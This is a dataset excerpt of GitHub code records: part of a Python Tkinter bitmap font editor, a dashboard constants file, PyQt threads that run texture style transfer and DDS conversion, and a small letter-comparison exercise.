\"big\"))\n\n self.Preset.close()\n except Exception as e:\n messagebox.showerror(\"Error\", \"Error while saving local settings:\\n{0}\".format(e))\n\n self.destroy()\n\n def save(self, event=None):\n if self.CurrentFile == \"\":\n name_raw = file.asksaveasfilename(confirmoverwrite=True, defaultextension=\".bmf\", title=\"Save As\",\n filetypes=((\"BitMap File\", '*.bmf'), (\"Text File\", \"*.txt\"),\n (\"All Files\", \"*.*\")))\n name = open(name_raw, \"wb\")\n else:\n name = open(self.CurrentFile, \"wb\")\n\n if name:\n name.write(int(self.Mode).to_bytes(1, \"big\"))\n\n for y in range(16):\n for x in range(16):\n for y_ in range(16):\n bin_value = \"\"\n for x_ in range(8):\n bin_value += str(self.Matrix[y][x].Pixels[x_][y_])\n name.write(int(bin_value, 2).to_bytes(1, \"big\"))\n\n self.CurrentFile = name.name\n self.modified(False)\n name.close()\n\n def save_as(self, event=None):\n self.CurrentFile = \"\"\n self.save()\n\n def open(self, event=None, in_file=None):\n self.check_save_status()\n\n if in_file:\n read = open(in_file, \"rb\")\n else:\n read_raw = file.askopenfilename(defaultextension=\".bmf\",\n filetypes=((\"BitMap File\", '*.bmf'),\n (\"Text File\", \"*.txt\"),\n (\"All Files\", \"*.*\")))\n read = open(read_raw, \"rb\")\n\n if read:\n read.read(1)\n for y in range(16):\n for x in range(16):\n for y_ in range(16):\n value = int.from_bytes(read.read(1), \"big\")\n for x_ in range(8):\n shift_val = bin(value)[2:].zfill(8)[x_:x_+1]\n self.Matrix[y][x].Pixels[x_][y_] = int(shift_val)\n self.select_grid(x, y)\n\n self.CurrentFile = read.name\n self.select_grid(0, 0)\n self.Draw.update_screen()\n self.modified(False)\n read.close()\n\n def export(self, mode, event=None):\n write_raw = file.asksaveasfilename(confirmoverwrite=False, defaultextension=\".\" + mode, title=\"Export As\",\n filetypes=((mode.upper(), \".\" + mode), (\"All Files\", \"*.*\")))\n if write_raw:\n write = open(write_raw, \"w\")\n if mode == \"asm\":\n write.write(\"{0}\".format(os.path.basename(self.CurrentFile).split(\".\")[0]))\n # write.write(\"\\n\\t; 8x{0} Character Size | 256 Characters Total\".format(8 * (self.Mode + 1)))\n for y in range(16):\n for x in range(16):\n write.write(\"\\n \\t.byte \")\n buffer = \"\"\n for y_ in range(8 * (self.Mode + 1)):\n bin_value = \"\"\n for x_ in range(8):\n bin_value += str(self.Matrix[y][x].Pixels[x_][y_])\n buffer += \"$\" + str(hex(int(bin_value, 2)))[2:].zfill(2).upper() + \", \"\n write.write(buffer[:len(buffer)-2])\n write.write(\" ;char 0x{0}, {1}\".format(hex(x + y * 16)[2:].zfill(2).upper(), x + y * 16))\n write.write(\"{0}_end\".format(os.path.basename(self.CurrentFile).split(\".\")[0]))\n\n elif mode == \"c\":\n write.write(\"// {0}\".format(os.path.abspath(self.CurrentFile)))\n write.write(\"\\n// 8x{0} Character Size | 256 Characters Total\".format(8 * (self.Mode + 1)))\n write.write(\"\\n{\")\n for y in range(16):\n for x in range(16):\n write.write(\"\\n \\t\")\n for y_ in range(8 * (self.Mode + 1)):\n bin_value = \"\"\n for x_ in range(8):\n bin_value += str(self.Matrix[y][x].Pixels[x_][y_])\n write.write(\"0x\" + str(hex(int(bin_value, 2)))[2:].zfill(2).upper() + \", \")\n write.write(\" //Char {0} ; {1}\".format(hex(x + y * 16)[2:].zfill(2).upper(), x + y * 16))\n write.write(\"\\n}\")\n\n elif mode == \"out\":\n write = open(write_raw, \"wb\")\n for y in range(16):\n for x in range(16):\n for y_ in range(8 * (self.Mode + 1)):\n bin_value = \"\"\n for x_ in range(8):\n bin_value += str(self.Matrix[y][x].Pixels[x_][y_])\n write.write(int(bin_value, 2).to_bytes(1, \"big\"))\n\n write.close()\n\n def copy(self, event=None):\n self.Copy = []\n for y_ in range(16):\n bin_value = \"\"\n for x_ in range(8):\n bin_value += str(self.Matrix[self.Y_Select][self.X_Select].Pixels[x_][y_])\n self.Copy.append(int(bin_value, 2))\n\n def paste(self, event=None):\n for y in range(16):\n txt = str(bin(self.Copy[y]))[2:].zfill(8)\n for x in range(8):\n self.Matrix[self.Y_Select][self.X_Select].Pixels[x][y] = int(txt[x])\n self.select_grid(self.X_Select, self.Y_Select)\n\n def build_matrix(self):\n hex_count_y = 0\n for y in range(18):\n row = []\n hex_count_x = 0\n for x in range(18):\n if x == 0 or x == 17:\n if y != 0 and y != 17:\n txt = tk.Label(master=self.UpperFrame, text=str(hex(hex_count_y)).upper()[2:],\n bg=self.background, fg=self.foreground, font=self.font)\n txt.grid(row=y, column=x)\n if x != 17:\n self.Y_Text.append(txt)\n if x == 17:\n hex_count_y += 1\n\n ToolTip(txt, \"Y Coordinate.\\nThis is the first Hex digit\\n>> 0xY0\")\n\n elif y == 0 or y == 17:\n if x != 0 and x != 17:\n txt = tk.Label(master=self.UpperFrame, text=str(hex(hex_count_x)).upper()[2:],\n bg=self.background, fg=self.foreground, font=self.font)\n txt.grid(row=y, column=x)\n if x != 17:\n self.X_Text.append(txt)\n hex_count_x += 1\n\n ToolTip(txt, \"X Coordinate.\\nThis is the second Hex digit\\n>> 0x0X\")\n else:\n matrix = ImageBox(master=self.UpperFrame, bg=self.draw_off, height=24, width=24,\n relief=\"flat\", bd=1, background=self.draw_off, foreground=self.draw_on)\n matrix.grid(row=y, column=x)\n matrix.bind(\"\", partial(self.select_grid, x - 1, y - 1))\n matrix.bind(\"\", partial(self.select_grid, x - 1, y - 1))\n matrix.bind(\"\", partial(self.select_grid, x - 1, y - 1))\n row.append(matrix)\n if y != 0:\n self.Matrix.append(row)\n\n def update_draw(self):\n for i in range(16):\n self.X_Text[i].config(bg=self.background, fg=self.foreground)\n self.Y_Text[i].config(bg=self.background, fg=self.foreground)\n\n self.Draw.Size = self.Size.get()\n self.Draw.config(height=self.Size.get() * 8, width=self.Size.get() * 8)\n self.Draw.Outline = self.Grid.get()\n self.Draw.Drag = self.Drag.get()\n self.select_grid(self.X_Select, self.Y_Select)\n\n def update_brush(self):\n self.Draw.Brush = self.BrushVar.get()\n\n def start_project(self, mode=None, event=None):\n if mode:\n self.check_save_status()\n self.destroy()\n os.system(\"python3 main.py\")\n\n def modified(self, status):\n self.Draw.Modified = status\n self.title(\"Bitmap Editor - {0}\".format(os.path.basename(self.CurrentFile)))\n if status:\n self.title(\"Bitmap Editor - {0} *\".format(os.path.basename(self.CurrentFile)))\n\n def check_save_status(self):\n if self.Draw.Modified:\n if tk.messagebox.askyesno(message=\"Do you want to Save?\"):\n self.save()\n\n def select_grid(self, x, y, event=None):\n if self.Hint.get():\n self.X_Text[self.X_Select].config(bg=self.background, fg=self.foreground)\n self.Y_Text[self.Y_Select].config(bg=self.background, fg=self.foreground)\n self.X_Text[x].config(bg=self.foreground, fg=self.background)\n self.Y_Text[y].config(bg=self.foreground, fg=self.background)\n\n if self.Draw.Applied:\n pass\n\n self.Matrix[self.Y_Select][self.X_Select].load(self.Draw.PixelGrid, mode=self.Mode)\n self.Draw.load(self.Matrix[y][x].Pixels)\n\n self.Matrix[self.Y_Select][self.X_Select].config(relief=\"flat\")\n self.Matrix[y][x].config(relief=\"solid\")\n self.X_Select, self.Y_Select = x, y\n\n hex_number = str(hex(y)[2:]) + str(hex(x)[2:])\n self.CurrentCoord.config(text=\"{0} | 0x{1}\".format(int(hex_number, 16), hex_number.upper()))\n if event and event.num == 2 or event and event.num == 3:\n extern = tk.Toplevel(master=self, height=20, width=20)\n extern.resizable(False, False)\n extern.title(\"{0} | 0x{1}\".format(int(hex_number, 16), hex_number.upper()))\n extern_canvas = tk.Canvas(master=extern, bg=self.draw_off, height=255, width=255, relief=\"solid\", bd=1)\n extern_canvas.pack(expand=1, fill=\"both\")\n\n for y in range(8 * (self.Mode + 1)):\n for x in range(8):\n fill = self.draw_off\n out = self.draw_on\n if self.Matrix[self.Y_Select][self.X_Select].Pixels[x][y]:\n fill = self.draw_on\n out = self.draw_off\n x_cord = x * 32\n y_cord = y * 32 / (self.Mode + 1)\n extern_canvas.create_rectangle(x_cord, y_cord, x_cord + 32, y_cord + 32 / (self.Mode + 1),\n fill=fill, outline=out, width=0)\n\n self.Draw.update_screen()\n\n def apply(self):\n self.Draw.Applied = True\n self.Matrix[self.Y_Select][self.X_Select].load(self.Draw.PixelGrid, mode=self.Mode)\n self.modified(True)\n\n def show_grid(self, event):\n if self.Grid.get():\n self.Grid.set(0)\n else:\n self.Grid.set(1)\n self.update_draw()\n\n def extend_draw(self, event):\n if self.Size.get() == 32:\n self.Size.set(16)\n else:\n self.Size.set(32)\n self.update_draw()\n\n def cursor(self, event):\n x, y = self.X_Select, self.Y_Select\n if event.keysym == \"Left\" or event.keysym == \"a\":\n x -= 1\n elif event.keysym == \"Right\" or event.keysym == \"d\":\n x += 1\n elif event.keysym == \"Up\" or event.keysym == \"w\":\n y -= 1\n elif event.keysym == \"Down\" or event.keysym == \"s\":\n y += 1\n\n if x < 0:\n x = 15\n if self.Wrap.get():\n y -= 1\n if x > 15:\n x = 0\n if self.Wrap.get():\n y += 1\n if y > 15:\n y = 0\n if y < 0:\n y = 15\n self.select_grid(x, y)\n\n def about_menu(self):\n menu = tk.Toplevel(self)\n menu.resizable(False, False)\n menu.title(\"About\")\n\n textbox = tk.Text(master=menu, height=10, width=30)\n textbox.insert(\"end\", InfoText)\n textbox.config(state=\"disabled\")\n textbox.pack(side=\"top\")\n exit_button = tk.Button(master=menu, text=\"Exit\", command=menu.destroy)\n exit_button.pack(side=\"bottom\", expand=0, fill=\"x\")\n\n def import_code(self, code):\n for i in code:\n if len(i) > 1:\n if i == \"[end]\":\n break\n elif not i[0] == \"#\":\n try:\n exec(i)\n except Exception as e:\n print(\"Error while Importing Code: \\n\", e)\n\n\nclass FileViewer(tk.Tk):\n def __init__(self, path, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n self.title(os.path.basename(path))\n\n self.ShowText = tk.Text(master=self, bg=\"#FFFFFF\", height=32, width=160)\n self.ShowText.pack(side=\"top\", expand=1, fill=\"both\")\n\n tk.Button(master=self, text=\"Close\", bg=\"#FFFFFF\",\n command=lambda: self.destroy()).pack(side=\"bottom\", expand=0, fill=\"x\")\n\n file_read = open(path, \"r\")\n for i in file_read.read():\n self.ShowText.insert(\"end\", i)\n file_read.close()\n\n self.ShowText.config(state=\"disabled\")\n\n\nclass ToolTip(object):\n def __init__(self, widget, text):\n widget.bind(\"\", self.showtip)\n widget.bind(\"\", self.hidetip)\n\n self.widget = widget\n self.text = text\n self.window = None\n self.id = None\n self.x = 0\n self.y = 0\n\n def showtip(self, event):\n if self.window or not self.text or not main.Tooltip.get():\n return\n x, y, cx, cy = self.widget.bbox(\"insert\")\n x += self.widget.winfo_rootx() + 57\n y += cy + self.widget.winfo_rooty() + 27\n\n self.window = tk.Toplevel(self.widget)\n self.window.overrideredirect(True)\n self.window.wm_geometry(\"+%d+%d\" % (x, y))\n\n label = tk.Label(self.window, text=self.text, background=\"#FFFFE0\", relief=\"solid\", bd=1, justify=\"left\")\n label.pack(ipadx=1)\n\n def hidetip(self, event):\n win = self.window\n self.window = None\n if win:\n win.destroy()\n\n\nclass DrawBox(tk.Canvas):\n def __init__(self, size, mode, background, foreground, *args, **kwargs):\n tk.Canvas.__init__(self, *args, **kwargs)\n self.background = background\n self.foreground = foreground\n self.Size = size\n self.Mode = mode\n self.X_coord = []\n self.Y_coord = []\n self.Brush = 0\n self.Outline = 1\n self.Drag = 1\n self.Modified = False\n self.Applied = False\n self.Previous_X = -1\n self.Previous_Y = -1\n self.PixelGrid = [[0 for _ in range(16)] for _ in range(8)]\n self.update_coord(size)\n\n self.config(height=size * 8 + 1, width=size * 8 + 1)\n self.bind(\"\", lambda e: self.draw(\"motion\", e))\n self.bind(\"\", lambda e: self.draw(\"click\", e))\n\n def update_coord(self, size):\n self.X_coord.clear()\n self.Y_coord.clear()\n for i in range(8):\n self.X_coord.append(i * size)\n for i in range((self.Mode + 1) * 8):\n self.Y_coord.append(int(i * (size / (self.Mode + 1))))\n\n def draw(self, click, event):\n ex = event.x - (self.Size / 2) # Brush Cursor fine tune\n ey = event.y - (self.Size / (2 * (self.Mode + 1)))\n x = int(min(self.X_coord, key=lambda x_: abs(x_ - (ex - int(self.Size / 16)))) / self.Size)\n y = int((min(self.Y_coord, key=lambda y_: abs(y_ - (ey - int(self.Size / 16)))) /\n (self.Size / 128) / (8 / (self.Size / 16)) / (self.Size / (self.Mode + 1))))\n if click == \"click\" or click == \"motion\" and self.Drag != 0:\n if self.Previous_X != x or self.Previous_Y != y or click == \"click\":\n if self.Brush == 2:\n if self.PixelGrid[x][y]:\n self.PixelGrid[x][y] = 0\n else:\n self.PixelGrid[x][y] = 1\n elif self.Brush:\n self.PixelGrid[x][y] = 1\n else:\n self.PixelGrid[x][y] = 0\n self.update_screen()\n self.Previous_X, self.Previous_Y = x, y\n\n def update_screen(self):\n self.delete(\"all\")\n for y in range(8 * (self.Mode + 1)):\n for x in range(8):\n fill = self.background\n out = self.foreground\n if self.PixelGrid[x][y]:\n fill = self.foreground\n out = self.background\n x_cord = x * self.Size\n y_cord = y * self.Size / (self.Mode + 1)\n self.create_rectangle(x_cord, y_cord, x_cord + self.Size, y_cord + self.Size / (self.Mode + 1),\n fill=fill, outline=out, width=self.Outline)\n\n def clear_screen(self, event=None):\n for y in range(8 * (self.Mode + 1)):\n for x in range(8):\n self.PixelGrid[x][y] = 0\n self.update_screen()\n\n def invert_screen(self, event=None):\n for y in range(8 * (self.Mode + 1)):\n for x in range(8):\n if self.PixelGrid[x][y]:\n self.PixelGrid[x][y] = 0\n else:\n self.PixelGrid[x][y] = 1\n self.update_screen()\n\n def load(self, carry):\n self.PixelGrid = carry\n\n\nclass ImageBox(tk.Canvas):\n def __init__(self, background, foreground, *args, **kwargs):\n tk.Canvas.__init__(self, *args, **kwargs)\n self.background = background\n self.foreground = foreground\n self.Pixels = [[0 for _ in range(16)] for _ in range(8)]\n\n def load(self, bitmap, mode):\n # self.Pixels = bitmap\n self.delete(\"all\")\n for y in range((mode + 1) * 8):\n for x in range(8):\n fill_color = self.background\n if bitmap[x][y]:\n fill_color = self.foreground\n self.create_rectangle(x * 3 + 2, (y * 3 + 2) / (mode + 1) + mode,\n x * 3 + 5, (y * 3 + 5) / (mode + 1) + mode,\n fill=fill_color, width=0)\n\n\nclass StartupDialog(tk.Tk):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.protocol(\"WM_DELETE_WINDOW\", self.exit_protocol)\n\n self.closed = False\n self.file = None\n self.ProjectSize = tk.IntVar()\n\n self.Button_Frame = tk.LabelFrame(master=self, text=\"Character Size:\", bg=\"#FFFFFF\")\n self.Button_Frame.pack(side=\"left\", fill=\"both\", expand=0)\n\n self.Action_Frame = tk.Frame(master=self, bg=\"#FFFFFF\")\n self.Action_Frame.pack(side=\"right\", fill=\"both\", expand=0)\n\n self.Button_8 = tk.Radiobutton(master=self.Button_Frame, variable=self.ProjectSize, value=0,\n text=\"8x8 Pixels\", bg=\"#FFFFFF\", justify=\"center\")\n self.Button_16 = tk.Radiobutton(master=self.Button_Frame, variable=self.ProjectSize, value=1,\n text=\"8x16 Pixels\", bg=\"#FFFFFF\", justify=\"center\")\n\n self.Continue_Button = tk.Button(master=self, text=\"Open\", bg=\"#FFFFFF\", command=self.destroy, width=15)\n self.Cancel_Button = tk.Button(master=self, text=\"Cancel\", bg=\"#FFFFFF\", command=self.exit_protocol)\n self.Open_Button = tk.Button(master=self, text=\"Open File\", bg=\"#FFFFFF\", command=self.fileopen)\n\n self.File_Label = tk.Label(master=self, text=\"File: None\\nNew Blank File\", bg=\"#FFFFFF\", justify=\"left\")\n\n self.Button_8.pack(side=\"top\", expand=1, fill=\"both\")\n self.Button_16.pack(side=\"bottom\", expand=1, fill=\"both\")\n\n self.Cancel_Button.pack(side=\"bottom\", expand=1, fill=\"x\", padx=2, pady=2)\n self.Continue_Button.pack(side=\"bottom\", expand=1, fill=\"x\", padx=2, pady=2)\n self.Open_Button.pack(side=\"top\", expand=1, fill=\"x\", padx=2, pady=2)\n self.File_Label.pack(side=\"top\", anchor=\"w\", padx=2, pady=2)\n\n self.Continue_Button.focus()\n\n self.bind(\"\", lambda _: self.destroy())\n self.bind(\"\", self.fileopen)\n self.bind(\"\", self.exit_protocol)\n\n def exit_protocol(self, event=None):\n self.closed = True\n self.destroy()\n\n def fileopen(self, event=None):\n self.file = file.askopenfilename(defaultextension=\".bmf\", filetypes=((\"BitMap File\", '*.bmf'),\n (\"Text File\", \"*.txt\"),\n (\"All Files\", \"*.*\")))\n if self.file:\n read = open(self.file, \"rb\")\n if int.from_bytes(read.read(1), \"big\") == 1:\n self.ProjectSize.set(1)\n else:\n self.ProjectSize.set(0)\n\n self.File_Label.config(text=\"File: {0}\\nDetected Size: {1}x{2}\".\n format(os.path.basename(self.file), 8, (self.ProjectSize.get() + 1) * 8))\n\n read.close()\n else:\n self.File_Label.config(text=\"File: None\\nNew Blank File\")\n self.file = None\n\n\nif __name__ == \"__main__\":\n selector = StartupDialog()\n selector.config(bg=\"#FFFFFF\")\n selector.title(\"Project Selector\")\n selector.resizable(False, False)\n selector.mainloop()\n\n if not selector.closed:\n main = Main(mode=selector.ProjectSize.get(), carry_file=selector.file) # Mode: 0 = 8x8 | 1 = 8x16\n main.resizable(False, False)\n main.title(\"Bitmap Editor\")\n main.mainloop()\n","repo_name":"0xMAC8205/Character-Bitmap-Editor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":35259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"25193770276","text":"home_page_location = \"/\"\npage_2_location = \"/page-2\"\npage_3_location = \"/page-3\"\n\nTIMEOUT = 60\n\ngraphs_list = [\n {\n \"title\": \"Battery SOC\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"bs\"\n },\n {\n \"title\": \"Pedal Angle\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"bp\"\n },\n {\n \"title\": \"GPS\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"gps\"\n },\n {\n \"title\": \"XYZ Linear Acceleration\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"xyzla\"\n },\n {\n \"title\": \"XYZ Gyroscope\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"xyzg\"\n },\n {\n \"title\": \"Battery Temperature\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"BT\"\n },\n {\n \"title\": \"Battery Voltage\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"BV\"\n }\n] ","repo_name":"sfuphantom/Wireless","sub_path":"frontend/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19049985031","text":"\nfrom PyQt5 import QtWidgets,QtCore\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog, QMenu, QMessageBox , QListWidgetItem\nfrom PyQt5.QtCore import pyqtSignal, QThread, Qt, QUrl, QPoint,QSize,QRect\nimport os\nimport time\nimport InfoNotifier\nfrom PIL import Image\nimport cv2\nimport glob\nfrom Gen_Style import style_transfer\nimport gen_jpg_tga_from_dds\nimport json\nimport gen_lerp_ret\nfrom path_util import PathUtils\nfrom button_state import GlobalConfig\n\n# tab3\nclass MyGenDdsJpgThreadTabPics(QThread):\n _signal = pyqtSignal()\n\n def __init__(self):\n super(MyGenDdsJpgThreadTabPics, self).__init__()\n self.exe_dir = os.getcwd() + \"\\\\dds_to_jpg/dds_to_jpg.exe\"\n self.show_list = []\n self.project_base = ''\n\n def set_para(self, content_list=None, project_base=''):\n if content_list is None:\n self.show_list = []\n self.show_list = content_list\n self.project_base = project_base\n\n def gen_jpg(self):\n try:\n InfoNotifier.InfoNotifier.g_progress_info.append(\"开始将贴图格式转换为jpg和tga····\")\n\n gen_jpg_tga_from_dds.gen_jpg_tga(work_=self.project_base, dds_list=self.show_list)\n InfoNotifier.InfoNotifier.g_progress_info.append(\"已生成jpg,tga格式图片\")\n self._signal.emit()\n except BaseException as e:\n print(e)\n\n def run(self):\n self.gen_jpg()\n\n\nclass MyGenStyleTempThreadTabPics(QThread):\n _signal = pyqtSignal()\n\n def __init__(self):\n super(MyGenStyleTempThreadTabPics, self).__init__()\n self.show_list = None\n self.chosen_style_pic = ''\n self.temp_file_name = ''\n\n def set_para(self, show_list=None, chosen_style_pic='', temp_file=''):\n if show_list is None:\n self.show_list = []\n self.show_list = show_list\n self.chosen_style_pic = chosen_style_pic\n self.temp_file_name = temp_file\n\n def gen_style(self):\n GlobalConfig.b_sync_block_in_thread_temp = True\n QApplication.processEvents()\n style_pic = self.chosen_style_pic\n content_list = self.show_list\n style_name = os.path.basename(style_pic).split('.')[0]\n if os.path.exists(self.temp_file_name) is False:\n os.makedirs(self.temp_file_name)\n\n \"\"\"让生成过的临时文件不再重新生成\"\"\"\n flag = True\n for i in range(len(content_list)):\n file_name = os.path.basename(content_list[i])\n if os.path.exists(self.temp_file_name + style_name + '/' + file_name) is False:\n flag = False\n break\n # style_main3(content_list, style_pic, self.temp_file_name)\n if flag is False:\n style_transfer.style_main_temp(content_list, style_pic)\n InfoNotifier.InfoNotifier.g_progress_info.append(\"完成,点击一张原图进行预览,并滑动微调栏杆调整插值参数\")\n GlobalConfig.b_sync_block_in_thread_temp = False\n self._signal.emit()\n\n def run(self):\n self.gen_style()\n\n\nclass MyGenStyleThreadTabPics(QThread):\n _signal = pyqtSignal()\n\n def __init__(self):\n super(MyGenStyleThreadTabPics, self).__init__()\n self.texconv_path = os.getcwd() + \"/texconv.exe\"\n self.project_base = ''\n self.content_list = []\n self.chosen_style_pic = ''\n self.lerg_value = 50\n\n def set_para(self, project_base='', content_list=None, style_path='', lerg_value=50):\n if content_list is None:\n self.content_list = []\n self.project_base = project_base\n self.content_list = content_list\n self.chosen_style_pic = style_path\n self.lerg_value = lerg_value\n\n def save_all(self):\n GlobalConfig.b_sync_block_op_in_progress = True\n QApplication.processEvents()\n InfoNotifier.InfoNotifier.g_progress_info.append(\"开始保存图片··············\")\n # gen_style_batch3.style_main3(self.content_list,self.chosen_style_pic)\n style_transfer.style_main(self.content_list, self.chosen_style_pic, self.project_base, False)\n for file in self.content_list:\n file_name = os.path.basename(file)\n get_path = PathUtils(self.project_base, self.chosen_style_pic, file)\n jpg_path = get_path.dds_to_jpg_path()\n tga_path = get_path.dds_to_tga_path()\n\n # lerp\n style_out_pic_path = get_path.get_style_path()\n if os.path.exists(style_out_pic_path) is False:\n InfoNotifier.InfoNotifier.g_progress_info.append(f\"不存在对应风格化图片{style_out_pic_path}。跳过本张图片\")\n continue\n lerp_out_path = get_path.get_jpg_lerp_path()\n if os.path.exists(os.path.dirname(lerp_out_path)) is False:\n os.makedirs(os.path.dirname(lerp_out_path))\n lerp_ret, _ = gen_lerp_ret.lerp_img(jpg_path, style_out_pic_path, self.lerg_value)\n gen_lerp_ret.write_img(lerp_ret, lerp_out_path)\n # combine alpha c\n tga_img = Image.open(tga_path)\n jpg_img = Image.open(lerp_out_path)\n ir_tmp, ig_tmp, ib_tmp, ia = tga_img.split()\n ir, ig, ib = jpg_img.split()\n tga_img = Image.merge('RGBA', (ir, ig, ib, ia))\n lerp_out_path = lerp_out_path.replace(\".jpg\", \".tga\")\n tga_img.save(lerp_out_path, quality=100)\n print(f\"generate tga image {lerp_out_path} after lerp op.\")\n InfoNotifier.InfoNotifier.g_progress_info.append(f\"生成插值操作后的tga图片: {lerp_out_path} \")\n # dds\n # 图片目录路径\n dds_out = get_path.get_dds_output_path()\n if os.path.exists(dds_out) is False:\n os.makedirs(dds_out)\n main_cmd = f\"{self.texconv_path} -dxt5 -file {lerp_out_path} -outdir {dds_out}\"\n main_cmd.replace(\"\\n\", \"\")\n os.system(main_cmd)\n InfoNotifier.InfoNotifier.g_progress_info.append('生成DDS贴图:' + dds_out + file_name)\n InfoNotifier.InfoNotifier.g_progress_info.append(\"保存完成\")\n GlobalConfig.b_sync_block_op_in_progress = False\n self._signal.emit()\n\n def run(self):\n self.save_all()\n\n\nclass MyGenSeamlessStyleThreadTabPics(QThread):\n _signal = pyqtSignal()\n\n def __init__(self):\n super(MyGenSeamlessStyleThreadTabPics, self).__init__()\n self.texconv_path = os.getcwd() + \"/texconv.exe\"\n self.project_base = ''\n self.content_list = []\n self.chosen_style_pic = ''\n self.lerg_value = 50\n\n def set_para(self, project_base='', content_list=None, style_path='', lerg_value=50):\n if content_list is None:\n self.content_list = []\n self.project_base = project_base\n self.content_list = content_list\n self.chosen_style_pic = style_path\n self.lerg_value = lerg_value\n\n def expanded(self):\n InfoNotifier.InfoNotifier.g_progress_info.append(\"开始保存图片··············\")\n GlobalConfig.b_sync_block_op_in_progress = True\n QApplication.processEvents()\n pad = 256\n for file in self.content_list:\n get_path = PathUtils(self.project_base, self.chosen_style_pic, file)\n\n jpg_path = get_path.dds_to_jpg_path()\n tga_path = get_path.dds_to_tga_path()\n expanded_jpg = get_path.get_expanded_jpg_path()\n expanded_tga = get_path.get_expanded_tga_path()\n # expand\n img_jpg = Image.open(jpg_path)\n img_tga = Image.open(tga_path)\n width = img_jpg.width\n height = img_jpg.height\n assert width == img_tga.width and height == img_tga.height\n\n img_jpg_pad = Image.new(\"RGB\", (width * 3, height * 3))\n img_tga_pad = Image.new(\"RGBA\", (width * 3, height * 3))\n for i in range(3):\n for j in range(3):\n img_jpg_pad.paste(img_jpg, (i * width, j * height, (i + 1) * width, (j + 1) * height))\n img_tga_pad.paste(img_tga, (i * width, j * height, (i + 1) * width, (j + 1) * height))\n img_jpg_crop = img_jpg_pad.crop((width - pad, height - pad, 2 * width + pad, 2 * height + pad))\n if os.path.exists(os.path.dirname(expanded_jpg)) is False:\n os.makedirs(os.path.dirname(expanded_jpg))\n img_jpg_crop.save(expanded_jpg, quality=100)\n print(expanded_jpg)\n img_tga_crop = img_tga_pad.crop((width - pad, height - pad, 2 * width + pad, 2 * height + pad))\n img_tga_crop.save(expanded_tga, quality=100)\n print(expanded_tga)\n InfoNotifier.InfoNotifier.g_progress_info.append(f'保存expand后图片:{expanded_jpg},jpg')\n\n def save_all(self):\n # gen_seamless_style_batch3.style_main3(self.content_list,self.chosen_style_pic)\n style_transfer.style_main(self.content_list, self.chosen_style_pic, self.project_base, True)\n for file in self.content_list:\n file = file.replace(\"\\n\", \"\")\n file_name = os.path.basename(file)\n\n get_path = PathUtils(self.project_base, self.chosen_style_pic, file)\n jpg_path = get_path.get_expanded_jpg_path()\n tga_path = get_path.get_expanded_tga_path()\n\n tmp_style_in = jpg_path\n\n # lerp\n style_out_pic_path = get_path.get_expanded_style_path()\n\n if os.path.exists(style_out_pic_path) is False:\n InfoNotifier.InfoNotifier.g_progress_info.append(f\"不存在对应风格化图片{style_out_pic_path}。跳过本张图片\")\n continue\n lerp_out_path = get_path.get_expanded_lerp_path_jpg()\n if os.path.exists(os.path.dirname(lerp_out_path)) is False:\n os.makedirs(os.path.dirname(lerp_out_path))\n lerp_ret, _ = gen_lerp_ret.lerp_img(tmp_style_in, style_out_pic_path, self.lerg_value)\n gen_lerp_ret.write_img(lerp_ret, lerp_out_path)\n # combine alpha c\n tga_img = Image.open(tga_path)\n jpg_img = Image.open(lerp_out_path)\n ir_tmp, ig_tmp, ib_tmp, ia = tga_img.split()\n ir, ig, ib = jpg_img.split()\n tga_img = Image.merge('RGBA', (ir, ig, ib, ia))\n lerp_out_path = lerp_out_path.replace(\".jpg\", \".tga\")\n tga_img.save(lerp_out_path, quality=100)\n print(f\"generate tga image {lerp_out_path} after lerp op.\")\n InfoNotifier.InfoNotifier.g_progress_info.append(f\"生成插值操作后的tga图片 {lerp_out_path} \")\n # seamless\n seamless_path = get_path.get_seamless_path()\n if os.path.exists(os.path.dirname(seamless_path)) is False:\n os.makedirs(os.path.dirname(seamless_path))\n img = Image.open(get_path.get_expanded_tga_path())\n width = img.width\n height = img.height\n pad = 256\n img_crop = img.crop((pad, pad, width - pad, height - pad))\n img_crop.save(seamless_path, quality=100)\n InfoNotifier.InfoNotifier.g_progress_info.append(\"生成无缝贴图:\" + seamless_path)\n dds_output = get_path.get_dds_output_path()\n if os.path.exists(dds_output) is False:\n os.makedirs(dds_output)\n main_cmd = f\"{self.texconv_path} -dxt5 -file {seamless_path} -outdir {dds_output}\"\n main_cmd.replace(\"\\n\", \"\")\n os.system(main_cmd)\n InfoNotifier.InfoNotifier.g_progress_info.append('生成DDS贴图:' + dds_output + file_name)\n\n InfoNotifier.InfoNotifier.g_progress_info.append(\"保存完成\")\n GlobalConfig.b_sync_block_op_in_progress = False\n self._signal.emit()\n\n def run(self):\n self.expanded()\n self.save_all()","repo_name":"ssh198811/style_swaper","sub_path":"sub_threads/tab_specific_pics_thread.py","file_name":"tab_specific_pics_thread.py","file_ext":"py","file_size_in_byte":11918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71788119639","text":"\r\n''' Let a user compare two letters and\r\nevaluate whether one occurs before\r\nthe other in the english alphabet'''\r\n\r\nfirst_letter = input(\"Input a letter: \")\r\nsecond_letter = input(\"Input another letter: \")\r\n\r\nif first_letter < second_letter:\r\n print(\"First letter comes before second\")\r\nelif first_letter > second_letter:\r\n print(\"Second letter comes before first\")\r\nelse:\r\n print(\"The letters are in equal position\")\r\n","repo_name":"Japhet09/BI","sub_path":"Python&R/lecture4/lecture_4_script_solutions/lecture_4_5.py","file_name":"lecture_4_5.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} 